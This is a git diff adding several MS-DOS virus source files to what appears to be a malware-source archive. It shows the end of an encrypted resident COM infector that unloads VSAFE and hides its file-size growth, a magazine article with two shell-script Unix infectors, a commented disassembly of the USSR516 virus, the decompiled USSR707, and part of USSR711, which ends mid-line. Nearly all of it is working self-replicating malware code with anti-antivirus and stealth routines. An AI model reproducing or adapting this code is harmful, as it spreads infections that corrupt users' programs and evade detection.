ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +xor word ptr [di],06acdh +not byte ptr [di] +add word ptr [di],04a83h +xor word ptr [di],0c3d7h +dec word ptr [di] +dec byte ptr [di] +not word ptr [di] +sub word ptr [di],0aa17h +xor word ptr [di],0e185h +add byte ptr [di],0b9h +xor byte ptr [di],061h +sub byte ptr [di],075h +xor byte ptr [di],030h +dec word ptr [di] +xor byte ptr [di],022h +dec word ptr [di] +add byte ptr [di],087h +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov cx,50 ;50 beep's! +beep: ;beep label! +mov ax,0E07h ; +int 10h ;print beep char +loop beep ;go! +NO_DAY: ; +ret ; +;--------------------------------- + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 01fH ;day for the action +action_mes Db 0cH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.unix.txt b/MSDOS/Virus.MSDOS.Unknown.unix.txt new file mode 100644 index 00000000..7804fce7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.unix.txt @@ -0,0 +1,63 @@ + + Lame Unix Viruses + +---------------+ + + Well, you might have read the title to this article and thought, well + if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can + be answered quite simply, we had one free space! :) It was a bit of + a dilemma to begin with, we had four articles and one space. The problem + was they were all kinda lame. So it was a lame pick of the month episode. + + Out of the four articles this was the leastest lamest. Well actually + I don't know about that, but anyway it was the most different one we + had sitting there. Just to prove the title, the author of these + masterpieces asked to remain anonymous to save his reputation. + + These "viruses" are the equivalent of a DOS batch file infector because + they are written in shell language. They function similarly to companion + infectors by renaming the original file and replacing it with themselves. + Disinfection is simple by 'mv'ing (moving) the original files back. + + Anyway, perhaps someone is interested so here they are. There isn't + much use for them except to annoy your friends when it messes up all + the files in their directory. + ++-----------------------------------+ +#!/bin/sh +# Dumb Unix Virus +# I dont wanna write anutha dumb unix virus qark, i wont +# Due to excess lameness, dont distribute +# +for files in * +do + if [ -x files ] + then + if [ ! -d files ] + then + mv files files.EVILVIRUS.HELPME + cp $0 files + chmod +x files + files.EVILVIRUS.HELPME + fi + fi + ++-----------------------------------+ + +cat << _EOF >unix.virus + + +#!/bin/csh +# Dumber Unix Virus +# by +# SumUtherGuy +foreach i (*) +mv $i bak.$i +cp $0 $i +i >> $i + +end +_EOF + ++-----------------------------------+ + + diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr516.asm b/MSDOS/Virus.MSDOS.Unknown.ussr516.asm new file mode 100644 index 00000000..cb87089a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ussr516.asm @@ -0,0 +1,278 @@ +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +; Disassembled by Dark Angel of PHALCON/SKISM +; for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +; This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ; Actually it's int 21h + ; entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ; BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ; DI -> orig4 + movsw ; restore original + movsw ; 4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ; int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ; Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ; Find marker bytes + jne findmarker ; to the entry point + mov [bp+4],di ; and move to + mov [bp+6],ds ; int30store + mov ax,5252h ; Get list of lists + int 21h ; and also ID check + + add bx,12h ; Already installed? + jz quitvir ; then exit + push bx + mov ah,30h ; Get DOS version + int 21h + + pop bx ; bx = 12, ptr to 1st + ; disk buffer + cmp al,3 + je handlebuffer ; if DOS 3 + ja handleDBHCH ; if > DOS 3 + inc bx ; DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ; Get seg:off of buffer + inc si + pop di + pop es ; ES:DI->seg:off buff + mov ax,[bx] ; ptr to next buffer + cmp ax,0FFFFh ; least recently used? + jne handlebuffer ; if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ; Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ; ptr to disk buffer + lodsw ; info + lodsw ; seg of disk buffer + ; hash chain head array + inc ax ; second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ; EMS page, -1 if not + ; in EMS + xchg ax,di ; save in di + lodsw ; ptr to least recently + ; used buffer + mov [di+2],ax ; change disk buffer + ; backward offset to + ; least recently used + xchg ax,di ; restore EMS page + mov [di],ax ; set to least recently +movetobuffer: ; used + mov di,bx + push ds + pop es ; ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ; Copy from start + rep movsw + mov ds,cx ; DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ; New interrupt handler + mov word ptr ds:[4*21h+2],es ; at int21 +quitvir: + push cs ; CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ; set up stack for + push si ; the return to the + retn ; original program +int24: + mov al,3 ; Ignore all errors + iret +tickstore db 3 ; Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ; CP/M style call entry + call dword ptr cs:[int30store-start] + retn ; point of int 21h + +int21DSDX: ; For int 21h calls + push ds ; with + lds dx,dword ptr [bp+2] ; DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ; Execute + je Execute + cmp ax,5252h ; ID check + je CheckID + cmp ah,30h ; DOS Version + je DosVersion +callorig21: ; Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ; Why????? ; DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ; Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ; # 2-17 + pop ax + pop es + iret +CheckID: ; ID Check + mov bx,0FFEEh ; FFEEh = -12h + iret +Execute: ; Execute + push ax ; Save registers + push cx + push es + push bx + push ds ; DS:DX -> filename + push dx ; save it on stack + push bp + mov bp,sp ; Set up stack frame + sub sp,0Ah ; Temporary variables + ; [bp-A] = attributes + ; [bp-8] = int 24 off + ; [bp-6] = int 24 seg + ; [bp-4] = file time + ; [bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ; Turn off ^C check + xor dl,dl ; (never turn it back + call int21 ; on. Bug???) + mov ax,3524h ; Get int 24h + call int21 ; (Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ; Set to new one + call int21 + mov ax,4300h ; Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ; Restore crit error + lds dx,dword ptr [bp-8] ; handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ; Call orig handler +continue: + mov [bp-0Ah],cx ; Save attributes + test cl,1 ; Check if r/o???? + jz noclearattr + xor cx,cx + mov ax,4301h ; Clear attributes + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Quit on error +noclearattr: + mov ax,3D02h ; Open read/write + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Exit if error + mov bx,ax + mov ax,5700h ; Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes to + call int21 ; buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h + jne quitinf ; Otherwise, quit + mov dx,word ptr ds:[buffer+1-start]; dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ; go there + call int21 + mov ds:[buffer-start],ax ; new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ; 0E9h means we might + jne infect ; already be there + mov ax,ds:[orig4+2-start] ; continue checking + add al,dh ; to see if we really + sub al,ah ; are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ; Go to EOF + call int21 + mov ds:[buffer+2-start],ax ; save filesize + mov cx,204h + mov ah,40h ; Write virus + call int21 + jc quitinf ; Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ; AX->jmp offset + mov word ptr ds:[buffer+1-start],ax; Set up buffer + mov byte ptr ds:[buffer-start],0E9h; code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ; Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ; Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ; Restore date/time + call int21 + mov ah,3Eh ; Close file + call int21 + mov cx,[bp-0Ah] ; Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ; Return +ussr516 ends + end stub + diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr707.asm b/MSDOS/Virus.MSDOS.Unknown.ussr707.asm new file mode 100644 index 00000000..3930628a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ussr707.asm @@ -0,0 +1,408 @@ + +PAGE 59,132 + +; +; +; USSR707 +; +; Created: 9-Feb-92 +; Passes: 5 Analysis Options on: AW +; +; + +data_1e equ 20h +data_2e equ 22h +data_3e equ 4Ch +data_4e equ 4Eh +data_5e equ 84h +data_6e equ 86h +data_7e equ 413h +data_8e equ 1460h +data_9e equ 3 +data_10e equ 2 + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ussr707 proc far + +start: + mov ax,offset loc_2 + push ax + retn +loc_2: + jmp short loc_3 + nop + +ussr707 endp + +; +; SUBROUTINE +; + +sub_2 proc near + call sub_3 + +; External Entry into Subroutine + +sub_3: + pop di + sub di,6 + retn +sub_2 endp + + db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah + db 26h,0FFh, 0Dh, 00h,0A0h, 00h + db 50h,0C3h, 01h, 2Eh,0A3h,0C0h + db 00h, 9Ch, 00h, 00h, 90h, 90h + db 90h,0CDh + db 20h +loc_3: + call sub_2 + mov ah,[di+21h] + mov byte ptr ds:[100h],ah + mov ax,[di+22h] + mov word ptr ds:[101h],ax + mov ax,[di+24h] + mov word ptr ds:[103h],ax + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp ax,1E03h + je loc_4 ; Jump if equal + jmp loc_9 +loc_4: + mov bl,0 + mov ax,4BFFh + int 21h ; ??INT Non-standard interrupt + cmp bl,0FFh + jne loc_5 ; Jump if not equal + jmp loc_9 +loc_5: + mov ax,ds:data_10e + mov [di+14h],ax + mov bx,di + add bx,0Fh + xor ax,ax ; Zero register + mov es,ax +loc_6: + xor si,si ; Zero register + mov ax,es + inc ax + cmp ax,0FFFh + jbe loc_7 ; Jump if below or = + jmp short loc_9 + nop +loc_7: + mov es,ax +loc_8: + mov ah,es:data_8e[si] + cmp ah,[bx+si] + jne loc_6 ; Jump if not equal + inc si + cmp si,5 + jne loc_8 ; Jump if not equal + mov [di+0Dh],es + mov word ptr [di+1Fh],0 + mov ax,cs + dec ax + mov es,ax + call sub_7 + sub si,di + mov ax,si + mov cl,4 + shr ax,cl ; Shift w/zeros fill + inc ax + sub es:data_9e,ax + sub ds:data_10e,ax + mov bx,[di+14h] + sub bx,ax + mov es,bx + push di + call sub_4 + xor cx,cx ; Zero register + mov ds,cx + mov cl,6 + shr ax,cl ; Shift w/zeros fill + inc ax + sub ds:data_7e,ax + mov ax,ds:data_5e + mov cs:[bx+0Bh],ax + mov ax,ds:data_6e + mov cs:[bx+0Dh],ax + push cs + pop ds + mov cx,si + mov si,di + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop di + sub bx,di + add bx,2 + xor ax,ax ; Zero register + mov ds,ax + cli ; Disable interrupts + mov ds:data_5e,bx + mov ds:data_6e,es + sti ; Enable interrupts +loc_9: + push cs + pop ds + push cs + pop es + mov ax,offset start + push ax + retn + +; +; SUBROUTINE +; + +sub_4 proc near + call sub_5 + +; External Entry into Subroutine + +sub_5: + pop bx + retn +sub_4 endp + + push bx + mov bh,4Bh ; 'K' + cmp bh,ah + je loc_11 ; Jump if equal + pop bx +loc_10: +;* jmp far ptr loc_1 + db 0EAh, 93h, 17h, 26h, 0Dh +loc_11: + cmp al,0FFh + jne loc_12 ; Jump if not equal + pop bx + mov bl,0FFh + iret ; Interrupt return + pushf ; Push flags +;* call far ptr sub_1 + db 9Ah, 00h, 00h, 00h, 00h + push ax + in al,61h ; port 61h, 8255 port B, read + xor al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode + mov ax,bx + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + pop ax + iret ; Interrupt return +loc_12: + push ax + push cx + push dx + push di + push ds + push es + mov bx,dx + xor di,di ; Zero register +loc_13: + inc di + cmp byte ptr [bx+di],0 + jne loc_13 ; Jump if not equal + cmp word ptr [bx+di-2],4D4Fh + je loc_14 ; Jump if equal + jmp loc_26 +loc_14: + cmp byte ptr [bx+di-3],43h ; 'C' + je loc_15 ; Jump if equal + jmp loc_26 +loc_15: + call sub_2 + mov bx,di + add bx,1Ah + mov ax,70h + mov es,ax + xor di,di ; Zero register +loc_16: + inc di + cmp di,0FFFFh + jbe loc_17 ; Jump if below or = + jmp loc_26 +loc_17: + xor si,si ; Zero register +loc_18: + mov ah,es:[di] + cmp ah,cs:[bx+si] + jne loc_16 ; Jump if not equal + inc si + inc di + cmp si,5 + jne loc_18 ; Jump if not equal + sub di,5 + xor ax,ax ; Zero register + mov es,ax + push word ptr es:data_3e + push word ptr es:data_4e + cli ; Disable interrupts + mov es:data_3e,di + mov word ptr es:data_4e,70h + sti ; Enable interrupts + call sub_2 + mov bx,dx + xor cx,cx ; Zero register + mov ah,4Eh ; 'N' + call sub_6 + jnc loc_19 ; Jump if carry=0 + jmp loc_25 +loc_19: + mov ah,2Fh ; '/' + call sub_6 + mov ax,es:[bx+1Ah] + cmp ax,0F000h + jbe loc_20 ; Jump if below or = + jmp loc_25 +loc_20: + push ds + push dx + push word ptr es:[bx+15h] + push word ptr es:[bx+16h] + push word ptr es:[bx+18h] + add ax,100h + mov cs:[di+18h],ax + mov ax,4301h + mov cx,20h + call sub_6 + mov ax,3D02h + call sub_6 + jnc loc_21 ; Jump if carry=0 + jmp short loc_24 + nop +loc_21: + push cs + pop ds + mov bx,ax + mov ah,3Fh ; '?' + mov cx,5 + mov dx,di + add dx,21h + call sub_6 + mov ax,[di+18h] + sub ax,[di+22h] + cmp ax,2C3h + jne loc_23 ; Jump if not equal + cmp byte ptr [di+20h],1Eh + jae loc_22 ; Jump if above or = + inc byte ptr [di+20h] +loc_22: + jmp short loc_24 + nop +loc_23: + mov byte ptr [di+17h],0B8h + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_6 + mov ah,40h ; '@' + mov cx,3 + mov dx,di + add dx,17h + call sub_6 + mov ah,40h ; '@' + mov cx,2 + mov word ptr [di+17h],0C350h + call sub_6 + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_6 + mov ah,40h ; '@' + call sub_7 + mov cx,si + sub cx,di + mov dx,di + call sub_6 +loc_24: + mov ax,5701h + pop dx + pop cx + call sub_6 + mov ax,4301h + pop cx + mov ch,0 + pop dx + pop ds + call sub_6 + mov ah,3Eh ; '>' + call sub_6 +loc_25: + xor ax,ax ; Zero register + mov es,ax + cli ; Disable interrupts + pop word ptr es:data_4e + pop word ptr es:data_3e + sti ; Enable interrupts +loc_26: + call sub_2 + cmp byte ptr cs:[di+1Fh],0 + jne loc_27 ; Jump if not equal + cmp byte ptr cs:[di+20h],1Eh + jb loc_27 ; Jump if below + mov byte ptr cs:[di+1Fh],1 + xor ax,ax ; Zero register + mov es,ax + call sub_4 + add bx,17h + mov ax,es:data_1e + mov cx,es:data_2e + mov cs:[bx+2],ax + mov cs:[bx+4],cx + cli ; Disable interrupts + mov es:data_1e,bx + mov es:data_2e,cs + sti ; Enable interrupts +loc_27: + pop es + pop ds + pop di + pop dx + pop cx + pop ax + pop bx + jmp loc_10 + +; +; SUBROUTINE +; + +sub_6 proc near + pushf ; Push flags + call dword ptr cs:[di+0Bh] + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + call sub_8 + +; External Entry into Subroutine + +sub_8: + pop si + add si,5 + retn +sub_7 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr711.asm b/MSDOS/Virus.MSDOS.Unknown.ussr711.asm new file mode 100644 index 00000000..979031ad --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ussr711.asm @@ -0,0 +1,384 @@ + +PAGE 59,132 + +; +; +; USSR711 +; +; Created: 9-Feb-92 +; Passes: 5 Analysis Options on: AW +; +; + +data_1e equ 20h +data_2e equ 22h +data_3e equ 4Ch +data_4e equ 4Eh +data_5e equ 84h +data_6e equ 86h +data_7e equ 0D9h +data_8e equ 0DBh +data_9e equ 122h +data_10e equ 124h +data_11e equ 13Ah +data_12e equ 13Ch +data_13e equ 441h +data_14e equ 3 +data_15e equ 12h +data_16e equ 0 +data_17e equ 0B0h +data_18e equ 0B2h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ussr711 proc far + +start: + jmp loc_1 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + call sub_1 + +ussr711 endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + xor di,di ; Zero register + mov si,bx + sub si,3 + mov ax,4B04h + int 21h ; ??INT Non-standard interrupt + cmp ax,44Bh +loc_1: + call sub_2 + +; External Entry into Subroutine + +sub_2: + pop bx + xor di,di ; Zero register + mov si,bx + sub si,3 + mov ax,4B04h + int 21h ; ??INT Non-standard interrupt + cmp ax,44Bh + je $+7Dh ; Jump if equal + mov ax,es + dec ax + mov es,ax + mov ax,es:data_14e + sub ax,2Ch + mov es:data_14e,ax + sub word ptr es:data_15e,2Ch + nop + mov es,es:data_15e + mov cx,2BBh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + cli ; Disable interrupts + xor ax,ax ; Zero register + mov ds,ax + mov cx,ds:data_5e + mov es:data_11e,cx + mov cx,ds:data_6e + mov es:data_12e,cx + mov word ptr ds:data_5e,126h + mov ds:data_6e,es + mov cx,ds:data_1e + mov es:data_7e,cx + mov cx,ds:data_2e + mov es:data_8e,cx + mov word ptr ds:data_1e,0B4h + mov ds:data_2e,es + mov cx,ds:data_3e + mov es:data_9e,cx + mov cx,ds:data_4e + mov es:data_10e,cx + mov word ptr ds:data_3e,0DDh + mov ds:data_4e,es + sti ; Enable interrupts + mov di,100h + mov si,bx + add si,2B3h + mov cx,3 + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,cs + mov es,ax + mov ds,ax + xor ax,ax ; Zero register + mov si,ax + mov di,0 + mov bx,offset start + jmp bx ; Register jump + add bl,[si] + db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h + db 00h, 40h, 2Eh,0A3h,0B2h, 00h + db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h + db 00h, 75h, 10h, 2Eh, 81h, 3Eh + db 0B2h, 00h, 74h, 37h, 75h, 07h + db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h + db 00h + db 58h,0EAh, 0Ah, 01h, 49h,0D7h + db 2Eh, 83h, 3Eh,0B0h, 00h, 00h + db 74h, 3Ch, 80h,0FCh, 03h, 74h + db 05h, 80h,0FCh, 0Bh + db 75h, 32h +loc_3: + test dl,80h + js loc_4 ; Jump if sign=1 + push ax + mov ax,cs:data_18e + and ax,3 + pop ax + jnz loc_4 ; Jump if not zero + push bp + add [bp+si+7Dh],dh + push ax + mov ax,cs + mov ds,ax + mov ax,[bp+6] + push ax + popf ; Pop flags + stc ; Set carry flag + pushf ; Push flags + pop ax + mov [bp+6],ax + xor ax,ax ; Zero register + mov ds,ax + pop ax + mov ah,80h + mov ds:data_13e,ah + pop ds + pop bp + iret ; Interrupt return +loc_4: +;* jmp far ptr loc_20 +sub_1 endp + + db 0EAh, 49h, 01h, 08h,0D7h + cmp ax,4B04h + jne loc_5 ; Jump if not 